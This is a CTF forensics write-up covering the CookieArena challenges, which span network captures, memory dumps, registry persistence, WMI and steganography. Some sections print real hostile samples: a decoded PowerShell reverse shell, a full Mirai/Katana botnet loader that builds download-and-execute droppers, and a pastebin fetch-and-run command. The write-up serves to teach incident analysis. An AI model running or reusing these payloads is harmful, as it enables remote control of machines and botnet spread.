# CookieArena CTF Forensics (Part 1)
## Thumbnail
`Description`
```
In Windows, thumbs.db files are database files containing the small images displayed when you view a folder in Thumbnail view (as opposed to Tile, Icon, List, or Detail view). These files are automatically generated by Windows, and there is no harm in deleting them or excluding them from system backups.
```
According to the description, we know that the file `thumbs.db` contains automatically stored images and is harmless. I found a tool to view these images at [here](https://thumbsdb.herokuapp.com/). Then I reviewed each image and got the `flag`.
## Small Stream
`Description`
```
I found a good ringtone, too bad they made me pay for it but nevermind I found a free copy then added some twist.
```
This is an audio challenge, and we were given a file named `small stream.pcapng`. I monitored the streams for a while, and one HTTP stream caught my attention.
We noticed a file 'ringtone.wav' being sent to the server via the POST method. I was curious and tried extracting this file for analysis.
By selecting the stream, locating the audio file, copying the hex stream, and using HxD to create an audio file.
The rest I refer to [here](https://github.com/V1nUn1H4ck1ngClub/VHC_CTF_2023/blob/main/forensics/small%20stream/solution.py) as the link containing the file is no longer available.
## Data Thief
`Description`
```
We got a notification that the administrative website (written in PHP) was attacked. Bad guys have exploited vulnerabilities and stolen data. We captured network packets during the monitoring process. Could you help us investigate and find stolen content?
```
From the activities in the `HTTP` and `TCP` streams, we can see that hackers used various attacks such as file upload, SQL injection, path traversal, brute force, OS commands, etc., to exploit data.
And from `TCP stream 922`, we can see that the file `flag.txt` was compressed into `secure.zip` with the password `Co0ki3Ar3n4`
Then, I switched to the `ICMP protocol` to check and found the components of `flag.txt` within the zip data.
Accordingly, `PK` is the signature of the compressed file ([here](https://en.wikipedia.org/wiki/List_of_file_signatures)).
Then, I proceeded to extract the `hex values` and input them into `HxD` to create the `.zip` file (note that the sequence numbers at the beginning need to be removed).
And finally, by extracting with the password `Co0ki3Ar3n4`, we will obtain the `flag`
## Tomcat
`Description`
```
Hackers attacked our Tomcat Web server. Our monitoring system collects network traffic during hacker intrusion. Please help us determine the attack method and what the stolen data is in the /flag.txt file.
```
After monitoring the `TCP stream` for a while, I noticed that the hacker was attempting to exploit server files, and towards the end, they successfully exploited the server using a `reverse shell`
The hacker exploited the system using Linux commands and found the `flag`
## Deleted SMS
`Description`
```
We receive information about thieves using text messages to exchange sensitive information. Before leaving, they deleted messages to erase traces. Is deleting this data safe? Please help us restore that secret message.
```
I received the `MyPhone` file. After checking the file and using the `strings` command, I found a sequence that made me think of a `Caesar cipher` ([here](https://www.dcode.fr/caesar-cipher))
## Báo cáo dang dở
`Description`
```
Hòa đang làm báo cáo bài tập lớn để nộp cho thầy giáo thì bỗng nhiên máy tính của anh ấy bị tắt đột ngột do mất điện mà anh ấy thì chưa kịp lưu báo cáo một lần nào. Tuy nhiên sau đó, thay vì viết báo cáo mới thì Hòa đã chọn cách dành ra 4h đồng hồ để khôi phục báo cáo ban đầu từ tệp crash dump nhưng cuối cùng vẫn thất bại. Hòa thực sự đang cần trợ giúp.
```
[Tải Challenge ở đây](https://drive.google.com/file/d/19OCHSjzHmzFBoSLYB90nkrZLnREpZ1nG/view?usp=drive_link) (pass: cookiehanhoan)
After downloading the data, I received the `MEMORY.DMP` file. At this point, I used volatility3 to analyze the processes in the `RAM`
```
python3 vol.py -f /home/kali/Desktop/MEMORY.DMP windows.pslist
```
According to the description, Hoa was working on a report when the computer suddenly shut down, and afterward, he used data recovery methods. Therefore, I believe the information we need to analyze is in the process of `WINWORD.EXE` .Then, by using procdump, I obtained many files, but the most notable one was the `AutoRecovery save of Document1` (this is the auto-recovered file of Microsoft Word), so I decided to attempt exploitation here.
```
python3 /home/kali/volatility3/vol.py -f MEMORY.DMP windows.dumpfiles --pid 1736
```
And finally, I found the `flag` hidden in an image within this file.
## Sổ đăng ký
`Description`
```
Hòa thấy hiện tượng lạ mỗi khi anh ta khởi động máy tính. Anh ta nghĩ rằng việc tải các video không lành mạnh gần đây đã khiến máy tính của anh ta bị hack.
```
[Tải Challenge ở đây](https://drive.google.com/file/d/1pShye_YtnUuIObPdnq9PeiIge0Oelsix/view?usp=drive_link) (pass: cookiehanhoan)
For this challenge, we need to identify the location where automatic actions are stored after booting the system. This could be login details or commands set to run on startup, specifically in `Software\Microsoft\Windows\CurrentVersion\Run`
After opening them with `Register Explorer`, I noticed a suspicious location.
```python=
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "(neW-obJEct io.COMprEssIon.dEFlATesTReAm( [sySTem.IO.memorYSTREam] [coNVeRT]::FRoMBAse64stRInG( 'TVFva4JAGP8qh7hxx/IwzbaSBZtsKwiLGexFhJg+pMs09AmL6rvP03S9uoe739/nZD+OIEHySmwolNn6F3wkzilH2HEbkDupvwXM+cKaWxWSSt2Bxrv9F64ZOteepU5vYOjMlHPMwNuVQnItyb8AneqOMnO5PiEsVytZnHkJUjnvG4ZuXB7O6tUswigGSuVI0Gsh/g1eQGt8h6gdUo98CskGQ8aIkgBR2dmUAw+9kkfvCiiL0x5sbwdNlQUckb851mTykfhpECUbdstXjo2LMIlEE0iCtedvhWgER1I7aKPHLrmQ2QGVmkbuoFoVvOE9Eckaj8+26vbcTeomqptjL3OLUM/0q1Q+030RMD73MBTYEZFuSmUMYbpEERduSVfDYZW8SvwuktJ/33bx/CeLEGirU7Zp52ZpLfYzPuQhZVez+SsrTnOg7A8='), [SYSTEM.iO.ComPReSSion.CoMPrEsSIonmODe]::DeCOmpresS)|FOREAcH-object{ neW-obJEct io.streAMrEadeR( $_,[sysTem.TExt.EnCoDING]::asCIi )}).reaDToEnD()|inVOKe-exprEsSIon"
```
The command is a `powershell` script that decodes `base64`, then decompresses deflate-compressed data, and finally executes the decode result. I ran it in a simulated `PowerShell environment` for better visibility.
```python=
$test = (neW-obJEct io.COMprEssIon.dEFlATesTReAm( [sySTem.IO.memorYSTREam] [coNVeRT]::FRoMBAse64stRInG( 'TVFva4JAGP8qh7hxx/IwzbaSBZtsKwiLGexFhJg+pMs09AmL6rvP03S9uoe739/nZD+OIEHySmwolNn6F3wkzilH2HEbkDupvwXM+cKaWxWSSt2Bxrv9F64ZOteepU5vYOjMlHPMwNuVQnItyb8AneqOMnO5PiEsVytZnHkJUjnvG4ZuXB7O6tUswigGSuVI0Gsh/g1eQGt8h6gdUo98CskGQ8aIkgBR2dmUAw+9kkfvCiiL0x5sbwdNlQUckb851mTykfhpECUbdstXjo2LMIlEE0iCtedvhWgER1I7aKPHLrmQ2QGVmkbuoFoVvOE9Eckaj8+26vbcTeomqptjL3OLUM/0q1Q+030RMD73MBTYEZFuSmUMYbpEERduSVfDYZW8SvwuktJ/33bx/CeLEGirU7Zp52ZpLfYzPuQhZVez+SsrTnOg7A8='), [SYSTEM.iO.ComPReSSion.CoMPrEsSIonmODe]::DeCOmpresS)|FOREAcH-object{ neW-obJEct io.streAMrEadeR( $_,[sysTem.TExt.EnCoDING]::asCIi )}).reaDToEnD()
```
`result`
```python=
$client = New-Object System.Net.Sockets.TCPClient("192.168.253.27",4953);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "CHH{N0_4_go_n0_st4r_wh3r3}" + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
```
Finally, we obtained the `flag` in the output. Another approach is to generate the `plaintext` using [here](https://gchq.github.io/CyberChef/#recipe=From_Base64('A-Za-z0-9%2B/%3D',true,false)Raw_Inflate(0,0,'Adaptive',false,false)&input=VFZGdmE0SkFHUDhxaDdoeHgvSXd6YmFTQlp0c0t3aUxHZXhGaEpnK3BNczA5QW1MNnJ2UDAzUzl1b2U3MzkvblpEK09JRUh5U213b2xObjZGM3dremlsSDJIRWJrRHVwdndYTStjS2FXeFdTU3QyQnhydjlGNjRaT3RlZXBVNXZZT2pNbEhQTXdOdVZRbkl0eWI4QW5lcU9Nbk81UGlFc1Z5dFpuSGtKVWpudkc0WnVYQjdPNnRVc3dpZ0dTdVZJMEdzaC9nMWVRR3Q4aDZnZFVvOThDc2tHUThhSWtnQlIyZG1VQXcrOWtrZnZDaWlMMHg1c2J3ZE5sUVVja2I4NTFtVHlrZmhwRUNVYmRzdFhqbzJMTUlsRUUwaUN0ZWR2aFdnRVIxSTdhS1BITHJtUTJRR1Zta2J1b0ZvVnZPRTlFY2thajgrMjZ2YmNUZW9tcXB0akwzT0xVTS8wcTFRKzAzMFJNRDczTUJUWUVaRnVTbVVNWWJwRUVSZHVTVmZEWVpXOFN2d3VrdEovMzNieC9DZUxFR2lyVTdacDUyWnBMZll6UHVRaFpWZXorU3NyVG5PZzdBOD0)
and
```python=
import base64
import zlib
data = "TVFva4JAGP8qh7hxx/IwzbaSBZtsKwiLGexFhJg+pMs09AmL6rvP03S9uoe739/nZD+OIEHySmwolNn6F3wkzilH2HEbkDupvwXM+cKaWxWSSt2Bxrv9F64ZOteepU5vYOjMlHPMwNuVQnItyb8AneqOMnO5PiEsVytZnHkJUjnvG4ZuXB7O6tUswigGSuVI0Gsh/g1eQGt8h6gdUo98CskGQ8aIkgBR2dmUAw+9kkfvCiiL0x5sbwdNlQUckb851mTykfhpECUbdstXjo2LMIlEE0iCtedvhWgER1I7aKPHLrmQ2QGVmkbuoFoVvOE9Eckaj8+26vbcTeomqptjL3OLUM/0q1Q+030RMD73MBTYEZFuSmUMYbpEERduSVfDYZW8SvwuktJ/33bx/CeLEGirU7Zp52ZpLfYzPuQhZVez+SsrTnOg7A8="
debase = base64.b64decode(data)
decomp = zlib.decompress(debase,-15)
print(decomp.decode())
#$client = New-Object System.Net.Sockets.TCPClient("192.168.253.27",4953);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "CHH{N0_4_go_n0_st4r_wh3r3}" + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
```
## Tin học văn phòng cơ bản
`Description`
```
Sau khi tham gia một khóa Tin học văn phòng cơ bản, Hòa đã có thể tự tạo một tệp tài liệu độc hại và anh ta có ý định sẽ dùng nó để hack cả thế giới
```
[Tải Challenge ở đây](https://drive.google.com/file/d/1WrLFE5qA-qJ6iLEQYQqCo0Xb99Yz8mTH/view?usp=drive_link) (pass: cookiehanhoan)
We could solve this challenge quickly using the `strings` command. However, I think the author's intention is to guide us towards techniques related to file types such as .docx, .xlsx, ...What I just mentioned refers to exploiting malicious `macros` in attack techniques such as `AutoOpen`, `DDE`, or `obfuscation`...By using the `olevba` tool to extract information about `macros` and `VBA code` (Visual Basic for Applications) snippets. ([olevba tool](https://github.com/decalage2/oletools))
And scrolling down, we find the `VBA` code containing the `flag`.
## Trivial FTP
`Description`
```
Việc những nhân viên của một công ty X sử dụng các giao thức không an toàn để kết nối và truyền tải tập tin từ xa đã tạo cơ hội cho những kẻ tấn công Man in the Middle và đánh cắp dữ liệu quan trọng của công ty
```
[Tải Challenge ở đây](https://drive.google.com/file/d/1AqsNR8eKe527iZJf1koNRs1pl9YhK0Ev/view?usp=drive_link) (pass: cookiehanhoan)
This is a challenge involving a `TFTP stream`. By following the TFTP traffic, we can see a stream containing `flag.pdf`
Accordingly, I `exported Objects` to extract the file, but it could not be opened.
Back to the stream containing `flag.pdf` we can see `transfer: netascii`. This is the format for data transfer over `TFTP`, which is outdated. After some searching, I found a location related to converting from `netascii` to `octet` ([here](https://github.com/shylent/python-tx-tftp/blob/master/tftp/netascii.py)). Accordingly, we need to convert the `hex bytes` of the `flag.pdf` file from `0d0a` to `0a` and from `0d00` to `0d`. We can use [CyberChef](https://cyberchef.org/#recipe=To_Hex('None',0)Find_/_Replace(%7B'option':'Regex','string':'0d0a'%7D,'0a',true,false,true,false)Find_/_Replace(%7B'option':'Regex','string':'0d00'%7D,'0d',true,false,true,false)) to do this. Then, simply copy the `hex` and create a new PDF file using `HxD` to obtain the `flag`
## Trivial Flag Transfer Protocol
`Description`
```
FTP protocol is plaintext data; you can easily see the data transfer between the client and server. Using Wireshark to analyse the pcap file, extract the data and find the FLAG,
Flag format is picoCTF{XXX}
```
This challenge is about a `TFTP stream`. I tried exporting the objects, and I found 5 files.
I downloaded the files and reviewed `instructions.txt` first.
```python=
GSGCQBRFAGRAPELCGBHEGENSSVPFBJRZHFGQVFTHVFRBHESYNTGENAFSRE.SVTHERBHGNJNLGBUVQRGURSYNTNAQVJVYYPURPXONPXSBEGURCYNA
```
I decoded the `ROT13 cipher` based on the challenge tag and received a message.
```python=
TFTPDOESNTENCRYPTOURTRAFFICSOWEMUSTDISGUISEOURFLAGTRANSFER.FIGUREOUTAWAYTOHIDETHEFLAGANDIWILLCHECKBACKFORTHEPLAN
#TFTP DOESNT ENCRYPT OUR TRAFFIC SO WE MUST DISGUISE OUR FLAG TRANSFER. FIGUREOUT AWAY TO HIDE THE FLAG AND I WILL CHECK BACK FOR THE PLAN
```
The message led us to the `plan`
```
VHFRQGURCEBTENZNAQUVQVGJVGU-QHRQVYVTRAPR.PURPXBHGGURCUBGBF
```
Continue decoding using `ROT13`
```python=
IUSEDTHEPROGRAMANDHIDITWITH-DUEDILIGENCE.CHECKOUTTHEPHOTOS
#I USED THE PROGRAM AND HID IT WITH-DUEDILIGENCE. CHECKOUT THE PHOTOS
```
The message briefly mentioned a program, which is a compressed data file. After extracting it, we can see that it is related to the `steghide` tool (used for retrieving hidden information embedded in files).
Next, we will analyze the `.bmp` files using `steghide`, and now what we need is the `password`. Let's try going back to the data in the `plan` file, and we will find the `password` there.
```python=
#I USED THE PROGRAM AND HID IT WITH-DUEDILIGENCE. CHECKOUT THE PHOTOS
```
`password` is `DUEDILIGENCE`
After trying the files, we found that the file `picture3.bmp` successfully extracted the `flag.txt` file.
## Corrupted PCAP
`Description`
```
The capture file appears to be damaged or corrupt. Could you find the FLAG?
Format Flag: CHH{XXX}
```
In this challenge, we were provided with a `pcap` file, but I couldn't open it, and it seems to be corrupted somewhere.
After searching on Google, I found that we can fix the file using the `pcapfix` tool. ([here](https://www.doyler.net/security-not-included/fixing-corrupted-capture-files))
After running it, we will get a stable pcap file, named `fixed_CorruptedPCAP.pcap`
After opening the repaired pcap file, we could hardly find anything useful in the main streams. However, something notable stands out in `where is my flag`. Then, I searched for this string and examined the non-displayed bytes. By scanning continuously, I noticed a slight difference when I pieced them together.
Then, by joining the strings together, we get the `flag` and replace `flag` with `CHH`
## Yellow Whistleblower
`Description`
```
A Machine Identification Code (MIC), also known as printer steganography, yellow dots, tracking dots, or secret dots, is a digital watermark that certain color laser printers and copiers leave on every printed page, allowing identification of the device which was used to print a document and giving clues to the originator.
Developed by Xerox and Canon in the mid-1980s, its existence became public only in 2004. In 2018, scientists developed privacy software to anonymize prints to support whistleblowers publishing their work.
The flag format is CHH{Manufacturer-YYYYMMDD-HHMM}
YYYY: Year
MM: Month
DD: Day
HH: Hour
MM: Minute
Manufacturer: Name of printer (eg, Epson, Dell, HP,..)
```
After researching`MIC` and `yellow dots`, I found a very useful file to work with the challenge-related content. ([here](https://github.com/dfd-tud/deda)). By installing the tool and converting the PDF to an image file, we can extract the information.
```
command: deda_parse_print p-1.png
```
With
```
The flag format is CHH{Manufacturer-YYYYMMDD-HHMM}
```
=> flag is `CHH{Epson-20200205-1002}`
## AudiCaty
`Description`
```
The Spectrogram View of an audio track provides a visual indication of how the energy in different frequency bands changes over time. The Spectrogram can show sudden onset of a sound, so it can often be easier to see clicks and other glitches or to line up beats in this view rather than in one of the waveform views.
When you got a message Flag{XXX}, please submit the flag with format CHH{XXX}
```
This is a decent challenge involving a wav file. We just need to open it in `Audacity` in `Spectrogram mode` and adjust the spectrum for better visibility.
=> flag is `CHH{No_Bullets_for_Player_001}`
## From The Above
`Description`
```
Every day multiple NOAA weather satellites pass above you. Each NOAA weather satellite broadcasts an Automatic Picture Transmission (APT) signal, which contains a live weather image of your area.
We have an APT audio recording. Could you decode it? When you got a message Flag{XXX}, please submit the flag with format CHH{XXX}
```
In this challenge, we received a `wav` file, and after some searching on `Google`, I found an online tool to convert data from the `wav` file. ([here](https://open-weather.community/decode/))
flag is `CHH{h3ll0_fr0m_th3_0th3r_Sky}`
## File Extension
`Description`
```
Is real photo?
```
In this challenge, we received an image file that couldn't be viewed. Using the `file` command, I found it to be a `32-bit Windows executable` file.
Then, I changed the file extension to `.exe` and ran it (note: it's recommended to run it in a `sandbox` or `virtual machine`...). Be sure to run it in the `cmd shell` to display the results and prevent crashes.
## Katana Botnet
`Description`
```
Gần đây chúng tôi phát hiện một số dịch vụ bất thường chạy trên máy chủ Linux của chúng tôi. Chúng tôi nghi ngờ nó đang bị lạm dụng để phân phối các tải trọng độc hại. Sau khi rà soát máy chủ, chúng tôi tìm thấy một tệp có vẻ là nguồn gốc của sự cố. Hãy giúp chúng tôi phân tích để tìm ra địa chỉ CnC đang lưu trữ tải trọng
```
After extracting the file, we obtained a malicious `Python` file containing a strange `Base64` string.
```python=
import subprocess, sys, urllib, time, base64, subprocess
ip = urllib.urlopen('http://api.ipify.org').read()
exec_bin = "yakuza"
exec_name = "wget.ssh"
bin_prefix = ""
bin_directory = "vi"
archs = ["x86.yakuza", #1
"mips.yakuza", #2
"mpsl.yakuza", #3
"arm4.yakuza", #4
"arm5.yakuza", #5
"arm6.yakuza", #6
"arm7.yakuza", #7
"ppc.yakuza", #8
"m68k.yakuza", #9
"sh4.yakuza"] #10
def run(cmd):
subprocess.call(cmd, shell=True)
print("\x1b[0;37m[CC] INSTALLING WEB SERVER DEPENDENCIES")
run("yum install httpd -y &> /dev/null")
run("service httpd start &> /dev/null")
run("yum install xinetd tftp tftp-server -y &> /dev/null")
run("yum install vsftpd -y &> /dev/null")
run("service vsftpd start &> /dev/null")
run('''echo "service tftp
{
socket_type = dgram
protocol = udp
wait = yes
user = root
server = /usr/sbin/in.tftpd
server_args = -s -c /var/lib/tftpboot
disable = no
per_source = 11
cps = 100 2
flags = IPv4
}
" > /etc/xinetd.d/tftp''')
run("service xinetd start &> /dev/null")
run('''echo "listen=YES
local_enable=NO
anonymous_enable=YES
write_enable=NO
anon_root=/var/ftp
anon_max_rate=2048000
xferlog_enable=YES
listen_address='''+ ip +'''
listen_port=21" > /etc/vsftpd/vsftpd-anon.conf''')
run("service vsftpd restart &> /dev/null")
run("service xinetd restart &> /dev/null")
print("\x1b[0;37m[CC] CREATING .SH BINS")
time.sleep(3)
run('echo "#!/bin/bash" > /var/lib/tftpboot/tyakuza.sh')
run('echo "ulimit -n 1024" >> /var/lib/tftpboot/tyakuza.sh')
run('echo "cp /bin/busybox /tmp/" >> /var/lib/tftpboot/tyakuza.sh')
run('echo "#!/bin/bash" > /var/lib/tftpboot/tyakuza2.sh')
run('echo "ulimit -n 1024" >> /var/lib/tftpboot/tyakuza2.sh')
run('echo "cp /bin/busybox /tmp/" >> /var/lib/tftpboot/tyakuza2.sh')
run('echo "#!/bin/bash" > /var/www/html/yakuza.sh')
run('echo "ulimit -n 1024" >> /var/lib/tftpboot/tyakuza2.sh')
run('echo "cp /bin/busybox /tmp/" >> /var/lib/tftpboot/tyakuza2.sh')
run('echo "#!/bin/bash" > /var/ftp/yakuza1.sh')
run('echo "ulimit -n 1024" >> /var/ftp/yakuza1.sh')
run('echo "cp /bin/busybox /tmp/" >> /var/ftp/yakuza1.sh')
def exploitmake(cmd):
subprocess.call(cmd, shell=True)
encoded = "Y2QgL3RtcDsgd2dldCBodHRwczovL3Bhc3RlYmluLmNvbS9yYXcvelltOHBWY3ogLU8gYSA+IC9kZXYvbnVsbCAyPiYxOyBjaG1vZCA3NzcgYTsgc2ggYSA+IC9kZXYvbnVsbCAyPiYxOyBybSAtcmYgYTsgaGlzdG9yeSAtYzsgY2xlYXI7"
exploit = str(base64.b64decode(encoded))
exploitmake(exploit)
for i in archs:
run('echo "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://' + ip + '/'+bin_directory+'/'+bin_prefix+i+'; curl -O http://' + ip + '/'+bin_directory+'/'+bin_prefix+i+';cat '+bin_prefix+i+' >'+exec_bin+';chmod +x *;./'+exec_bin+' '+exec_name+'" >> /var/www/html/yakuza.sh')
run('echo "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; ftpget -v -u anonymous -p anonymous -P 21 ' + ip + ' '+bin_prefix+i+' '+bin_prefix+i+';cat '+bin_prefix+i+' >'+exec_bin+';chmod +x *;./'+exec_bin+' '+exec_name+'" >> /var/ftp/yakuza1.sh')
run('echo "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; tftp ' + ip + ' -c get '+bin_prefix+i+';cat '+bin_prefix+i+' >'+exec_bin+';chmod +x *;./'+exec_bin+' '+exec_name+'" >> /var/lib/tftpboot/tyakuza.sh')
run('echo "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; tftp -r '+bin_prefix+i+' -g ' + ip + ';cat '+bin_prefix+i+' >'+exec_bin+';chmod +x *;./'+exec_bin+' '+exec_name+'" >> /var/lib/tftpboot/tyakuza2.sh')
run("service xinetd restart &> /dev/null")
run("service httpd restart &> /dev/null")
run('echo -e "ulimit -n 99999" >> ~/.bashrc')
print("\x1b[0;37m[CC] BUILDING MIRAI PAYLOAD PAYLOAD")
time.sleep(3)
print("\x1b[0;37m[CC] FINISHED SETTING UP MIRAI PAYLOAD")
complete_payload = ("cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://" + ip + "/yakuza.sh; curl -O http://" + ip + "/yakuza.sh; chmod 777 yakuza.sh; sh yakuza.sh; tftp " + ip + " -c get tyakuza.sh; chmod 777 tyakuza.sh; sh tyakuza.sh; tftp -r tyakuza2.sh -g " + ip + "; chmod 777 tyakuza2.sh; sh tyakuza2.sh; ftpget -v -u anonymous -p anonymous -P 21 " + ip + " yakuza1.sh yakuza1.sh; sh yakuza1.sh; rm -rf yakuza.sh tyakuza.sh tyakuza2.sh yakuza1.sh; rm -rf *")
f = open("payload.txt","w+")
f.write(complete_payload)
f.close()
print("\x1b[0;37m[CC] YOUR MIRAI PAYLOAD OUTPUTTED TO: PAYLOAD.TXT")
time.sleep(3)
run("ulimit -u99999; ulimit -n99999")
run("clear")
run("rm -rf ~/payload.py")
exit()
```
`base64` string
```
Y2QgL3RtcDsgd2dldCBodHRwczovL3Bhc3RlYmluLmNvbS9yYXcvelltOHBWY3ogLU8gYSA+IC9kZXYvbnVsbCAyPiYxOyBjaG1vZCA3NzcgYTsgc2ggYSA+IC9kZXYvbnVsbCAyPiYxOyBybSAtcmYgYTsgaGlzdG9yeSAtYzsgY2xlYXI7
```
`decoded` ([here](https://cyberchef.org/#recipe=From_Base64('A-Za-z0-9%2B/%3D',true,false)&input=WTJRZ0wzUnRjRHNnZDJkbGRDQm9kSFJ3Y3pvdkwzQmhjM1JsWW1sdUxtTnZiUzl5WVhjdmVsbHRPSEJXWTNvZ0xVOGdZU0ErSUM5a1pYWXZiblZzYkNBeVBpWXhPeUJqYUcxdlpDQTNOemNnWVRzZ2MyZ2dZU0ErSUM5a1pYWXZiblZzYkNBeVBpWXhPeUJ5YlNBdGNtWWdZVHNnYUdsemRHOXllU0F0WXpzZ1kyeGxZWEk3))
```
cd /tmp; wget https://pastebin.com/raw/zYm8pVcz -O a > /dev/null 2>&1; chmod 777 a; sh a > /dev/null 2>&1; rm -rf a; history -c; clear;
```
I tried accessing the [url](https://pastebin.com/raw/zYm8pVcz) in the decoded segment and obtained the `flag`
`flag` is `CHH{Mirai_aka_Katana_b0tn3t}`
## Dismantling
`Description`
```
Be careful with Alternative Protocol
```
For this challenge, after monitoring the `streams`, the strangest part was the odd strings preceding the URL `cookiearena.com`. I then filtered the streams containing these queries for analysis.
I used `tshark` with the following `command` to extract data and save it to `a.txt`
```
tshark -r Dismantling.pcap -Y "ip.src == 192.168.25.2 && dns.qry.name" -T fields -e dns.qry.name > a.txt
```
After manually filtering other `urls` and processing with `python`, we objained.
At this point, I searched for the signature `504B` and found that it represents a compressed file format. ([here](https://en.wikipedia.org/wiki/List_of_file_signatures))
Then, I used the following `yython script` to filter `urls` after the dot, and finally input the `hex bytes` into `HxD` to create a new file.
```python=
with open('a.txt', 'r') as f:
lines = f.readlines()
data = [line.split('.')[0] +"\n" for line in lines]
with open('b.txt', 'w') as f:
f.writelines(data)
```
After checking with `file` command on Linux, I discovered it was an `Excel` file. Finally, I just changed the file extension to get the `flag`
## Event Subscription
`Description`
```
Đội CSIRT của chúng tôi được yêu cầu xử lý sự cố trên một máy chủ mà chúng tôi đã xử lý xong cách đây vài ngày. Vì vậy chúng tôi tin rằng vẫn còn một cơ chế persistence nào đó của kẻ tấn công mà chúng tôi đã bỏ sót
```
After researching keywords on Google, this appears to be a `WMI Forensics` challenge.
```
WMI is a built-in tool in Windows environments, legitimately used by administrators, setup scripts, and monitoring software. However, WMI can also be exploited during all stages of post-exploitation. Identify normal activity and look for anomalies
```
And
```
The WMI repository is a database that contains information about the Windows Management Instrumentation (WMI) classes installed on a computer, and it has the following structure:
OBJECTS.DATA: Objects managed by WMI
INDEX.BTR: Index of files imported into OBJECTS.DATA
MAPPING[1-3].MAP: Correlates data in OBJECTS.DATA and INDEX.BTR
```
And I found a Python tool related to analyzing `WMI Forensics` ([here](https://github.com/davidpany/WMI_Forensics))
Accordingly, `PyWMIPersistenceFinder.py`
```
PyWMIPersistenceFinder.py is designed to find WMI persistence via FitlerToConsumerBindings solely by keyword searching the OBJECTS.DATA file without parsing the full WMI repository.
In testing, this script has found the exact same data as python-cim's show_FilterToConsumerBindings.py without requiring the setup. Only further testing will indicate if this script misses any data that python-cim can find.
In theory, this script will detect FilterToConsumerBindings that are deleted and remain in unallocated WMI space, but I haven't had a chance to test yet.
```
`Usage`
```
PyWMIPersistenceFinder.py <OBJECTS.DATA file>
```
I used this `command`
```
python2 /home/kali/WMI_Forensics/PyWMIPersistenceFinder.py OBJECTS.DATA
```
`Result`
```python=
Enumerating FilterToConsumerBindings...
2 FilterToConsumerBinding(s) Found. Enumerating Filters and Consumers...
Bindings:
WMI-WMI
Consumer:
Consumer Type: CommandLineEventConsumer
Arguments: powershell -e ZQBjAGgAbwAgACIAQwBIAEgAewBXAE0ASQBfAFQAaAAzAF8ANQB0AGUANABsAHQAaAB5AF8AYwAwAG0AUAAwAG4AMwBOAHQAdAB9ACIA
Consumer Name: WMI
Consumer:
Consumer Type: CommandLineEventConsumer
Arguments: \\.\root\subscription:__Win32Provider.Name="CommandLineEventConsumer"
Consumer Name: WMI
Other: Event
Filter:
Filter name: WMI
Filter Query: WmiProv
Filter:
Filter name: WMI
Filter Query: SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325
Filter:
Filter name: WMI
Filter Query: RD_TRACE_RESERVED_0d
Filter:
Filter name: WMI
Filter Query: TRACE_FLAG_TIMER
Filter:
Filter name: WMI
Filter Query: HeaderName
Filter:
Filter name: WMI
Filter Query: Description
Filter:
Filter name: WMI
Filter Query: WMIProv
Filter:
Filter name: WMI
Filter Query: WmiGenerateHeader
Filter:
Filter name: WMI
Filter Query: PowerMeterProvider
Filter:
Filter name: WMI
Filter Query: AMENDMENT
Filter:
Filter name: WMI
Filter Query:
Filter:
Filter name: WMI
Filter Query: guid
Filter:
Filter name: WMI
Filter Query: HBAType
Filter:
Filter name: WMI
Filter Query: locale
Filter:
Filter name: WMI
Filter Query: Connection
Filter:
Filter name: WMI
Filter Query: GuidName1
Filter:
Filter name: WMI
Filter Query: Guid
Filter:
Filter name: WMI
Filter Query: localeid
Filter:
Filter name: WMI
Filter Query: wmiprov
Filter:
Filter name: WMI
Filter Query: cpp_quote
Filter:
Filter name: WMI
Filter Query: DisplayName
Filter:
Filter name: WMI
Filter Query: Locale
SCM Event Log Consumer-SCM Event Log Filter
(Common binding based on consumer and filter names, possibly legitimate)
Consumer: NTEventLogEventConsumer ~ SCM Event Log Consumer ~ sid ~ Service Control Manager
Filter:
Filter name: SCM Event Log Filter
Filter Query: select * from MSFT_SCMEventLogEvent
```
We can see the filtered information in the payload, and there is a suspicious `powershell` script, I attempted to decode it using `base64`, and we objained the `flag`
[link here](https://cyberchef.org/#recipe=From_Base64('A-Za-z0-9%2B/%3D',true,false)To_Hex('Space',0)Find_/_Replace(%7B'option':'Regex','string':'00%20'%7D,'',true,false,true,false)From_Hex('Auto')&input=WlFCakFHZ0Fid0FnQUNJQVF3QklBRWdBZXdCWEFFMEFTUUJmQUZRQWFBQXpBRjhBTlFCMEFHVUFOQUJzQUhRQWFBQjVBRjhBWXdBd0FHMEFVQUF3QUc0QU13Qk9BSFFBZEFCOUFDSUE)
## Ecoji
`Description`
```
Annie nghi ngờ rằng chồng mình có nhân tình vì anh ta thường xuyên sử dụng emoji (biểu tượng cảm xúc) của Windows để nhắn tin như một dạng mã hóa tin nhắn. Vì vậy nhân lúc chồng đi vắng, cô ấy quyết định forensics xem anh ta đã nhắn những gì
```
For this challenge, we were given a large folder. I tried searching on `Google` using `keywords` like `Windows forensics Emoji` and found a source that mentioned the location of `emojis` [link here](https://res260.medium.com/%EF%B8%8F-%EF%B8%8F-windows-forensics-how-to-retrieve-and-parse-the-emoji-picker-history-in-the-filesystem-d3766282325a)
According to the article, `emojis` are stored at: `%localappdata%\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\Settings` and are located in the file `settings.dat`
